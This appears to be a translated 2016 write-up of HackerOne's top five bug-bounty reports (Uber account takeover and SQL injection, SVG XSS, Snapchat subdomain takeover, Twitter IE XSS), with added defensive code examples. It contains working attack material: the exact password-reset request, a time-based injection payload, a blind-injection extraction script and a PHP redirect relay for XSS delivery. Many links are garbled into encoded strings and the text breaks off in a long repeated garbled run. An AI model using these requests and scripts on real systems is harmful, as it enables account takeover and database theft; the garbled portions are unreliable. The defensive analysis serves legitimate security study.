[Tech Share] HackerOne Q3 Top 5 Vulnerability Reports
Posted: 2016-10-31 10:31 2053

News link: 969K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3u0G2j5X3q4G2i4K6u0W2x3K6j5H3i4K6u0W2j5$3&6Q4x3V1k6D9k6h3q4J5L8X3W2F1k6#2)9J5c8X3c8W2N6r3q4A6L8q4)9J5c8U0x3I4y4o6N6Q4x3X3g2Z5N6r3#2D9
News time: 2016-10-31 10:12:47
News body:
c9fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4l9$3i4K6u0W2M7h3S2A6L8h3N6Q4x3X3g2U0L8$3#2Q4x3V1k6@1x3o6p5@1k6r3j5K6x3h3q4V1k6U0N6U0z5e0V1$3z5e0x3%4i4K6u0W2M7r3&6Y4
Translator: sinensis

Estimated fee: 150 RMB (think you can do better? submit your own!)

Submission: send an e-mail to linwei#360.cn, or log in to the web version and submit online

Preface

The HackerOne Q3 Top 5 vulnerability reports are about to be revealed.

This quarter we went all out on the Vegas competition, Hacked the World, and kicked off a lively discussion in a Reddit AMA. Our hackers earned a total of $10,000,000 in bounties during the competition. Most importantly, they helped companies find the heavyweight vulnerabilities below.

These five were not picked from a rough estimate; they were carefully evaluated to make sure nothing is duplicated and that the list is more than a simple summary of bugs. Detailed reports are the most instructive, which is why we publish them.

Vulnerability details

1. Mongo found a vulnerability while reviewing Uber's passwordless signup mechanism. Uber fixed it within a day, and after Mongo confirmed the fix he received $10,000. Uber is deeply grateful to Mongo, and we are delighted to have people like Mongo on HackerOne.

The vulnerability Mongo found:

Via /rt/users/passwordless-signup, the password of any Uber user could be changed given the victim's phone number (or by brute-force enumeration of phone numbers to find already registered users).

Mongo tested it with his own phone number:

POST /rt/users/passwordless-signup HTTP/1.1
Host: cn-geo1.uber.com
User-Agent: client/iphone/2.137.1
Connection: close
Content-Type: application/json
Content-Length: 197
{"phoneNumberE164":"+xxxxxxxx","userWorkflow":"PASSWORDLESS_SIGNUP","userRole":"client","mobileCountryISO2":"XX","state":"CREATE_NEW_PASSWORD","newPasswordData":{"newPassword":"12345678911a!"}}

The HTTP response:

{"phoneNumberE164":"+xxxxxxxx","serverState":"SUCCEEDED","serverStateData":{"nextState":"SIGN_IN"},"tripVerifyStateData":{},"userMessage":"New password has been created. Please login with the new Password.","userRole":"client","userWorkflow":"PASSWORDLESS_SIGNUP"}
Steps to reproduce:

1. First register a rider account (the iOS or Android client both work).

2. Send a POST request to the URL shown above, with the phoneNumberE164 field set to the phone number whose password you want to change (including the country code, e.g. +1xxx for the US). The request may need to be repeated twice; eventually the response "New password has been created" comes back, at which point the password of that phone number has been changed to the newPassword field from the POST body.

3. Log in with the new password at c5cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4u0A6k6r3g2J5M7#2)9J5k6i4g2T1k6i4u0Q4x3X3g2U0L8$3#2Q4c8e0N6Q4z5e0W2Q4b7V1u0Q4c8e0g2Q4b7V1c8Q4z5e0g2Q4c8e0k6Q4z5o6S2Q4z5e0k6Q4c8e0S2Q4z5o6m8Q4z5o6g2Q4c8e0g2Q4z5o6g2Q4b7U0k6Q4c8e0c8Q4b7V1u0Q4z5e0k6Q4c8e0S2Q4b7f1g2Q4b7V1g2Q4c8e0g2Q4b7e0c8Q4z5o6N6Q4c8e0y4Q4z5o6m8Q4z5o6t1`.
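The root cause here is a workflow whose "state" field is supplied by the client: sending state=CREATE_NEW_PASSWORD together with a phone number was enough. The following added example (written for this page; it is not Uber's code and not part of the original report) contrasts a handler that trusts the client's state with one that keeps the workflow state server-side and only honours CREATE_NEW_PASSWORD for a phone number verified by a one-time code in the same session. The store names, the OTP flow, the attempt limit and the response fields are assumptions made for the demonstration.

```python
import secrets

# Demonstration stores (assumed, not Uber's): users maps an E.164 phone number to
# its account record; sessions maps a server-issued token to workflow state.


def start_passwordless_signup(sessions, phone):
    """Step 1: record the phone as unverified and issue a one-time code.

    In production the code is sent by SMS and never returned to the caller; it is
    returned here only so the demonstration can complete the flow offline.
    """
    token = secrets.token_urlsafe(16)
    code = f"{secrets.randbelow(10**6):06d}"
    sessions[token] = {"phone": phone, "code": code, "verified": False, "attempts": 0}
    return token, code


def verify_code(sessions, token, code, max_attempts=5):
    """Step 2: the session becomes verified only on a correct code; repeated failures lock it."""
    s = sessions.get(token)
    if s is None or s["attempts"] >= max_attempts:
        return False
    s["attempts"] += 1
    if secrets.compare_digest(s["code"], code):
        s["verified"] = True
        return True
    return False


def handler_vulnerable(users, body):
    """The reported bug class: the client's own 'state' field drives the transition,
    so naming any registered phone number is enough to set its password."""
    if body.get("state") == "CREATE_NEW_PASSWORD":
        user = users.get(body.get("phoneNumberE164"))
        if user is not None:
            user["password"] = body["newPasswordData"]["newPassword"]
            return {"serverState": "SUCCEEDED", "serverStateData": {"nextState": "SIGN_IN"}}
    return {"serverState": "FAILED"}


def handler_hardened(users, sessions, body, token):
    """Workflow state lives server-side. CREATE_NEW_PASSWORD is honoured only for a
    session whose phone number was verified, and only for that same phone number."""
    s = sessions.get(token)
    if s is None or not s["verified"]:
        return {"serverState": "FAILED", "userMessage": "Verify your phone number first."}
    if body.get("phoneNumberE164") != s["phone"]:
        return {"serverState": "FAILED", "userMessage": "Phone number does not match this session."}
    if body.get("state") != "CREATE_NEW_PASSWORD":
        return {"serverState": "FAILED", "userMessage": "Unexpected state."}
    user = users.get(s["phone"])
    if user is None:
        return {"serverState": "FAILED", "userMessage": "Unknown account."}
    user["password"] = body["newPasswordData"]["newPassword"]
    del sessions[token]  # one-shot: a verified session cannot be replayed
    return {"serverState": "SUCCEEDED", "serverStateData": {"nextState": "SIGN_IN"}}
```

The hardened handler never reads the transition from the request body: the only thing that can move a session to the "verified" state is a correct code for the phone number the server recorded, the phone number in the password-change request must equal the one that was verified, and the session is consumed after one use. The same pattern (server-owned state, bound to the verified identifier) applies to password reset and account recovery flows generally.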

2. Of the reports in this series, only orange knew how to get the most out of a trip. In this case in China, orange found a SQL injection in Uber's .cn domain while unsubscribing; the report earned $4,000.

The vulnerability orange found:

While travelling in China and using Uber, orange received an Uber advertisement containing an unsubscribe link. He noticed that this unsubscribe link differed from the usual one, and that it was vulnerable to SQL injection.

The payload:

ba0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4U0N6s2u0S2j5$3E0Q4x3X3g2W2L8h3q4A6L8q4)9J5k6i4g2T1k6i4u0Q4x3X3g2U0L8$3#2Q4x3X3g2U0L8W2)9J5c8Y4c8J5j5h3y4C8i4K6u0r3N6h3&6K6N6h3u0K6j5%4u0A6j5X3g2Q4x3X3g2V1L8#2)9K6c8Y4m8Q4x3@1c8W2P5f1Z5I4j5K6u0h3P5g2R3J5L8r3E0u0K9X3!0Y4d9h3A6g2x3@1&6f1g2h3N6k6g2K6g2C8d9f1S2z5M7#2A6i4g2Y4N6w2c8p5g2&6d9#2b7H3P5p5W2A6N6$3N6u0L8V1A6D9h3e0u0h3M7r3c8E0g2Y4W2u0K9X3!0Y4d9h3@1&6P5g2W2i4y4h3&6K9g2f1u0@1k6g2M7I4K9r3q4i4N6$3W2X3f1g2)9K6c8q4)9K6c8l9`.`.
The link above made the database sleep for 12 seconds. The value of the p parameter is base64; decoded, it reads:

8d5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4U0N6s2u0S2j5$3E0Q4x3X3g2W2L8h3q4A6L8q4)9J5k6i4g2T1k6i4u0Q4x3X3g2U0L8$3#2Q4x3X3g2U0L8W2)9J5c8Y4c8J5j5h3y4C8i4K6u0r3N6h3&6K6N6h3u0K6j5%4u0A6j5X3g2Q4x3X3g2V1L8#2)9K6c8Y4m8Q4x3@1c8Q4y4@1t1`."user_id": "5755 and sleep(12)=1", "receiver": "orange@mymail"}
orange then wrote a blind-injection script to obtain the database name and database user:

import json
import string
import requests
from urllib import quote
from base64 import b64encode
base = string.digits + '_-@.'
payload = {"user_id": 5755, "receiver": "blog.orange.tw"}
for l in range(0, 30):
    for i in 'i'+base:
        payload['user_id'] = "5755 and mid(user(),%d,1)='%c'#"%(l+1, i)
        new_payload = json.dumps(payload)
        new_payload = b64encode(new_payload)
        r = requests.get('b7aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4U0N6s2u0S2j5$3E0Q4x3X3g2W2L8h3q4A6L8q4)9J5k6i4g2T1k6i4u0Q4x3X3g2U0L8$3#2Q4x3X3g2U0L8W2)9J5c8Y4c8J5j5h3y4C8i4K6u0r3N6h3&6K6N6h3u0K6j5%4u0A6j5X3g2Q4x3X3g2V1L8#2)9K6c8Y4m8Q4x3@1c8Q4x3U0N6Q4x3V1u0I4N6h3!0@1k6g2)9J5z5r3&6W2N6#2)9#2k6Y4m8S2P5h3I4G2j5h3c8Q4x3U0W2Q4x3U0V1`.
        if len(r.content)>0:
            print i,
            break
The result was the MySQL user sendcloud_w@10.9.79.210 and the database sendcloud.
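The injectable value travelled as base64-encoded JSON inside an unsubscribe link, and the decoded user_id was spliced into a query as text. The following added example (written for this page; it is not Uber's or sendcloud's code) puts the bug class beside its fix: the vulnerable handler formats the decoded fields into SQL, while the hardened one verifies an HMAC over the link parameter before decoding it, type-checks user_id, and binds both values as query parameters. SQLite stands in for MySQL, and the table, the subscriber rows and the signing key are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import json
import sqlite3

# Constructed sample data (not from the report): three subscribers.
SUBSCRIBERS = [(5755, "orange@mymail"), (5756, "a@example.test"), (5757, "b@example.test")]
# Hypothetical server-side secret used to sign unsubscribe links.
LINK_KEY = b"constructed-demo-key"


def make_db():
    """Fresh in-memory table so each call starts from the same three subscribed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE subscribers (user_id INTEGER PRIMARY KEY, email TEXT, subscribed INTEGER)")
    conn.executemany("INSERT INTO subscribers VALUES (?, ?, 1)", SUBSCRIBERS)
    conn.commit()
    return conn


def encode_p(payload):
    """Build the base64 JSON 'p' parameter in the shape the report's link carried it."""
    return base64.b64encode(json.dumps(payload).encode()).decode()


def sign_p(p):
    """HMAC over the opaque parameter; a signed link carries p and this tag."""
    return hmac.new(LINK_KEY, p.encode(), hashlib.sha256).hexdigest()


def vulnerable_unsubscribe(conn, p):
    """The reported bug class: decoded fields are formatted straight into SQL.

    Returns the number of rows changed, so the effect of a tampered user_id is visible."""
    data = json.loads(base64.b64decode(p))
    sql = "UPDATE subscribers SET subscribed=0 WHERE user_id=%s AND email='%s'" % (
        data["user_id"], data["receiver"])
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def hardened_unsubscribe(conn, p, sig):
    """Returns an HTTP-style status: 403 bad signature, 400 malformed payload,
    404 no matching subscriber, 200 unsubscribed."""
    # 1. The link is server-generated, so reject anything that was not signed by us.
    if not hmac.compare_digest(sign_p(p), sig):
        return 403
    # 2. Decode defensively; garbage is a client error, not a server error.
    try:
        data = json.loads(base64.b64decode(p))
    except (ValueError, TypeError):
        return 400
    user_id = data.get("user_id")
    if isinstance(user_id, bool) or not isinstance(user_id, int):
        return 400
    receiver = data.get("receiver")
    if not isinstance(receiver, str):
        return 400
    # 3. Bound parameters: the values can never become part of the SQL text.
    cur = conn.execute(
        "UPDATE subscribers SET subscribed=0 WHERE user_id=? AND email=?", (user_id, receiver))
    conn.commit()
    return 200 if cur.rowcount == 1 else 404
```

Parameter binding alone removes the injection; the signature is the second, independent layer that stops a recipient from editing the link at all, which also closes the enumeration of other users' ids that an unsigned unsubscribe link invites. The test below shows the vulnerable handler touching every row when user_id carries extra SQL, and the hardened handler refusing the same input at the type check.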

3. Paragonie_Scott is one of the more outstanding teams on HackerOne; analysing this unusual .svg report reminded us how different .svg is. Unlike other image formats, carefully constructed .svg code can execute. Adbullah received the largest reward in the history of the Paragon program, not to mention 3,500 page views.

The vulnerability:

Premise: browsers handle SVG files terribly. If you process user-uploaded SVG files, make sure they are only ever served with the Content-Type text/plain.

Background:

Adbullah ran into some trouble setting up Airship on Ubuntu, so he tested on Paragon's site instead.

If you upload any file (HTML, SWF, etc.) to trigger XSS, the resulting Content-Type becomes "text/plain;charset=us-ascii". The same applies to images, but if the uploaded format is SVG with JavaScript inside, the upload is ultimately allowed.

With the Content-Type set to "Content-Type: image/svg+xml; charset=us-ascii", the attack succeeds and is stored in the user's account.

d28K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4l9H3i4K6u0W2M7h3S2A6L8h3N6Q4x3X3g2U0L8$3#2Q4x3V1k6@1x3o6q4W2k6h3b7%4k6o6j5%4x3K6m8X3z5e0q4S2z5o6k6T1i4K6u0W2M7r3&6Y4
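The premise above (serve user-supplied SVG only as text/plain) is a decision about how stored uploads are served, not about what the client declares. The following added example (written for this page; it is not Airship's or Paragon's code) shows that decision as code: the client's Content-Type is ignored, only files whose leading bytes match a known raster format are served inline with their sniffed type, and everything else, SVG included, goes out as inert text with an attachment disposition. The magic-byte table, the markup pattern and the header set are assumptions for the demonstration.

```python
import re

# Raster formats the endpoint is willing to serve inline, keyed by their leading bytes.
RASTER_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}
# Markup that turns a "picture" into a document a browser will parse as XML/HTML and may execute.
ACTIVE_MARKUP = re.compile(
    rb"<\s*(?:\?xml|svg|script|html|!doctype|iframe|object|embed)\b", re.IGNORECASE)


def sniff_raster(content):
    """Return the MIME type implied by the file's own bytes, or None if it is not a known raster."""
    for magic, mime in RASTER_MAGIC.items():
        if content.startswith(magic):
            return mime
    return None


def headers_for_upload(content, declared_type):
    """Headers to serve a stored upload with, and whether it carried active markup.

    declared_type is what the uploader claimed; it is accepted as an argument only to make
    the point that it plays no part in the decision."""
    headers = {"X-Content-Type-Options": "nosniff"}
    mime = sniff_raster(content)
    if mime is not None:
        headers["Content-Type"] = mime
        headers["Content-Disposition"] = "inline"
        return headers, False
    # Not a verified raster: SVG, HTML, SWF or anything else is served as inert text,
    # as a download, and under a policy that forbids scripts even if a viewer mis-parses it.
    headers["Content-Type"] = "text/plain; charset=us-ascii"
    headers["Content-Disposition"] = "attachment"
    headers["Content-Security-Policy"] = "default-src 'none'; sandbox"
    flagged = ACTIVE_MARKUP.search(content[:4096]) is not None
    return headers, flagged
```

The flag is what a defender would log or alert on: an upload that claims to be an image but opens with `<?xml`, `<svg` or `<script` is worth a look even though the response headers already make it harmless. If SVG must be displayed inline for product reasons, it needs a sanitiser that strips scripts, event handlers and external references before storage, which is a separate and larger piece of work than this header policy.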

4. We often see phrases like "this vulnerability probably isn't a big deal..." in hacker reports; that is far too modest. This takeover of 338K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3k6S2M7%4c8D9P5g2)9J5k6i4y4U0i4K6u0V1j5$3c8F1i4K6u0W2L8X3g2@1i4@1f1#2i4@1q4p5i4K6V1H3i4@1f1#2i4K6W2r3i4K6W2r3i4@1f1#2i4K6V1H3i4K6S2p5i4@1f1$3i4K6S2m8i4@1p5#2i4@1f1#2i4K6V1I4i4K6S2m8i4@1f1#2i4@1t1H3i4@1t1I4i4@1f1$3i4K6V1^5i4@1q4r3i4@1f1^5i4@1u0r3i4K6V1&6i4@1f1$3i4@1p5H3i4@1t1%4i4@1f1#2i4@1u0o6i4K6R3H3i4@1f1#2i4@1p5%4i4K6S2n7i4@1f1%4i4K6W2m8i4K6R3@1i4@1f1K6i4K6R3H3i4K6R3J5
by Ebrietas started from an old DNS record and ended with a $3,000 bounty. Many thanks for his report, which kept users from being served the wrong content.

The vulnerability:

I found a test instance that Snapchat was running on a CDN host, but when that host was decommissioned the DNS record remained. So I could create a new Fastly instance on it and take it over. I confirmed through Censys records that it belonged to Snapchat.

I recently found that this host is still being used by Snapchat. I found the following in the server log:

root@localhost:~# cat /var/log/apache2/access.log |  grep -v server-status | grep snapchat -i
23.235.39.33 - - [02/Aug/2016:18:28:25 +0000] "GET /bq/story_blob?story_id=fRaYutXlQBosonUmKavo1uA&t=2&mt=0 HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.1 (iPad2,5; iOS 9.1; gzip)"
23.235.39.43 - - [02/Aug/2016:18:28:25 +0000] "GET /bq/story_blob?story_id=f3gHI7yhW-Q7TeACCzc2nKQ&t=2&mt=0 HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.1 (iPad2,5; iOS 9.1; gzip)"
23.235.46.45 - - [03/Aug/2016:02:40:48 +0000] "GET /bq/story_blob?story_id=fKGG6u9zG4juOFT7-k0PNWw&t=2&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (Nexus 7; Android 5.1.1#1836172#22; gzip)"
23.235.46.23 - - [03/Aug/2016:02:40:49 +0000] "GET /bq/story_blob?story_id=fco3gXZkbBCyGc_Ym8UhK2g&t=2&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (Nexus 7; Android 5.1.1#1836172#22; gzip)"
43.249.75.20 - - [03/Aug/2016:12:39:03 +0000] "GET /discover/dsnaps?edition_id=4527366714425344&dsnap_id=5651565881327616&hash=66e61fa7787383c08a76a131e96915eec2d8b3019a3a96af66496003c9a9b1c1&publisher=Refinery29&quality=android_med9to16-android_med9to16 HTTP/1.1" 404 455 "-" "Snapchat/9.21.1.0 (GT-I9300; Android 4.3#I9300XWUGML4#18; gzip)"
43.249.75.24 - - [03/Aug/2016:12:39:03 +0000] "GET /bq/story_blob?story_id=ftzqLQky4KJ_B6Jebus2Paw&t=2&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (GT-I9300; Android 4.3#I9300XWUGML4#18; gzip)"
43.249.75.22 - - [03/Aug/2016:12:39:03 +0000] "GET /bq/story_blob?story_id=fEXbJ2SDn3Os8m4aeXs-7Cg&t=2&mt=0 HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (GT-I9300; Android 4.3#I9300XWUGML4#18; gzip)"
23.235.46.21 - - [03/Aug/2016:14:46:18 +0000] "GET /bq/story_blob?story_id=fu8jKJ_5yF71_WEDi8eiMuQ&t=1&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.1 (iPhone5,2; iOS 9.2; gzip)"
23.235.46.28 - - [03/Aug/2016:14:46:19 +0000] "GET /bq/story_blob?story_id=flWVBXvBXToy-vhsBdze11g&t=1&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.1 (iPhone5,2; iOS 9.2; gzip)"
23.235.44.35 - - [04/Aug/2016:05:57:37 +0000] "GET /bq/story_blob?story_id=fuZO-2ouGdvbCSggKAWGTaw&t=0&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (SAMSUNG-SGH-I537; Android 5.0.1#I537UCUCOC7#21; gzip)"
23.235.44.46 - - [04/Aug/2016:05:57:37 +0000] "GET /bq/story_blob?story_id=fa3DTt_mL0MhekUS9ZXg49A&t=0&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (SAMSUNG-SGH-I537; Android 5.0.1#I537UCUCOC7#21; gzip)"
185.31.18.21 - - [04/Aug/2016:19:50:01 +0000] "GET /bq/story_blob?story_id=fDL270uTcFhyzlRENPVPXnQ&t=0&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.1 (iPhone7,1; iOS 9.3.2; gzip)"
So it looks like I could serve arbitrary content, regardless of which app was using it.
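The log excerpt is the evidence that matters on the defender's side: a hostname whose DNS record was left pointing at a released CDN endpoint was still receiving requests from the production mobile app. The following added example (written for this page; not the reporter's or Snapchat's code) parses Apache combined-format lines like the ones above, groups them by client application and platform, and answers the question an operator should ask before retiring a hostname or leaving its record in place: does a first-party client still call it? Four of the sample lines are copied from the excerpt above; the fifth, a scanner hit from 198.51.100.7, is constructed to show unrelated traffic being separated out.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" log format; the request target keeps its query string.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Four lines from the report's excerpt plus one constructed scanner line (198.51.100.7).
SAMPLE_LOG = """\
23.235.39.33 - - [02/Aug/2016:18:28:25 +0000] "GET /bq/story_blob?story_id=fRaYutXlQBosonUmKavo1uA&t=2&mt=0 HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.1 (iPad2,5; iOS 9.1; gzip)"
23.235.46.45 - - [03/Aug/2016:02:40:48 +0000] "GET /bq/story_blob?story_id=fKGG6u9zG4juOFT7-k0PNWw&t=2&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (Nexus 7; Android 5.1.1#1836172#22; gzip)"
43.249.75.20 - - [03/Aug/2016:12:39:03 +0000] "GET /discover/dsnaps?edition_id=4527366714425344&dsnap_id=5651565881327616&hash=66e61fa7787383c08a76a131e96915eec2d8b3019a3a96af66496003c9a9b1c1&publisher=Refinery29&quality=android_med9to16-android_med9to16 HTTP/1.1" 404 455 "-" "Snapchat/9.21.1.0 (GT-I9300; Android 4.3#I9300XWUGML4#18; gzip)"
185.31.18.21 - - [04/Aug/2016:19:50:01 +0000] "GET /bq/story_blob?story_id=fDL270uTcFhyzlRENPVPXnQ&t=0&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.1 (iPhone7,1; iOS 9.3.2; gzip)"
198.51.100.7 - - [04/Aug/2016:20:00:00 +0000] "GET /wp-login.php HTTP/1.1" 404 453 "-" "Mozilla/5.0 (constructed-scanner)"
"""


def parse_line(line):
    """One combined-format line to a dict, with the app name, path and platform split out."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["app"] = rec["ua"].split("/", 1)[0]          # "Snapchat/9.21.1.1 (...)" -> "Snapchat"
    rec["path"] = rec["target"].split("?", 1)[0]     # drop the query string
    plat = re.search(r"\b(iOS|Android)\b", rec["ua"])
    rec["platform"] = plat.group(1) if plat else "unknown"
    return rec


def summarize(log_text):
    """Per-application view: request count, distinct paths, platforms and source addresses."""
    summary = defaultdict(lambda: {"requests": 0, "paths": set(), "platforms": set(), "sources": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        entry = summary[rec["app"]]
        entry["requests"] += 1
        entry["paths"].add(rec["path"])
        entry["platforms"].add(rec["platform"])
        entry["sources"].add(rec["ip"])
    return dict(summary)


def safe_to_decommission(log_text, first_party_app):
    """A hostname (and its DNS record) may be retired only when no first-party client still calls it."""
    return first_party_app not in summarize(log_text)
```

Run over a retention window rather than a single day, the summary shows whether live clients still depend on the name. The complementary control is on the DNS side: when a CDN or cloud resource is released, the CNAME that pointed at it is removed in the same change, and a periodic job resolves every record in the zone and flags names whose target no longer belongs to an asset the organisation controls.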

5. secgeek from Egypt reported this vulnerability to Twitter: HTML injection, and possibly XSS, on sms-be-vip.twitter.com. It affects the latest version of Internet Explorer (IE 11) and leads to HTML tag injection and JavaScript execution. At HackerOne we particularly value professionalism and seeking common ground while respecting differences; the report earned $420.

The vulnerability:

The 404 page of sms-be-vip.twitter.com appears to have XSS and HTML injection, because it does not encode HTML tags, e.g. 629K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6K6L8i4y4Q4x3X3c8T1k6g2)9J5k6s2k6A6M7q4)9J5k6i4c8%4K9i4c8@1k6i4u0Q4x3X3g2U0L8$3#2Q4x3V1k6Q4x3U0k6D9N6q4)9K6b7X3R3I4i4K6t1$3k6%4c8Q4x3@1u0f1c8g2y4f1i4K6t1$3L8s2c8Q4x3@1u0Q4x3V1k6Z5x3g2)9J5y4X3N6@1i4K6y4n7i4@1f1K6i4K6R3H3i4K6R3J5

To trigger it, the URL must be sent without being encoded, but browsers generally encode URLs. In the latest IE 11 and older IE versions, however, this can be done.

How do we make IE 11 send the URL without encoding it?

IE does not encode the URL when following a 302 redirect, so we can write a relay script:

<?php
$url = $_GET['x'];
header("Location: $url");
?>
Then use the script above to send a request to the location with the XSS.

56fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2j5$3N6W2k6h3E0Q4x3X3g2F1k6i4c8Q4x3V1k6b7e0@1y4Q4x3V1k6J5k6h3c8A6M7W2)9J5k6i4m8Z5M7q4)9K6c8Y4S2Q4x3@1c8Z5N6s2c8H3M7#2)9K6b7g2)9J5c8W2)9J5c8Y4y4E0M7#2)9J5k6r3u0W2i4K6u0V1N6X3W2H3i4K6u0W2N6s2N6A6N6s2c8W2M7W2)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4X3I4@1i4K6y4n7K9o6q4Q4x3U0k6Y4N6q4)9K6b7W2c8q4f1#2c8Q4x3U0k6D9N6q4)9K6b7W2)9J5c8X3R3I4i4K6t1$3k6%4c8Q4x3@1t1`.
Now, in IE, you will see an HTTP error message instead of <h1>TEST</h1> on the error page.

Microsoft's HTTP error message appears when both of the following conditions hold:

1. The HTTP status is one of [400, 403, 404, 405, 406, 408, 409, 410, 500, 501, 505]

2. The HTTP response length is below a preset value; for 404 that value is 512 bytes.

So I appended more data to get around that:

3b6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2j5$3N6W2k6h3E0Q4x3X3g2F1k6i4c8Q4x3V1k6b7e0@1y4Q4x3V1k6J5k6h3c8A6M7W2)9J5k6i4m8Z5M7q4)9K6c8Y4S2Q4x3@1c8Z5N6s2c8H3M7#2)9K6b7g2)9J5c8W2)9J5c8Y4y4E0M7#2)9J5k6r3u0W2N6X3W2H3i4K6u0W2N6s2N6A6N6s2c8W2M7W2)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4X3I4@1i4K6y4n7K9o6q4Q4x3U0k6Y4N6q4)9K6b7W2c8q4f1#2c8Q4x3U0k6D9N6q4)9K6b7W2)9J5c8X3R3I4i4K6t1$3k6%4c8Q4x3@1u0Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2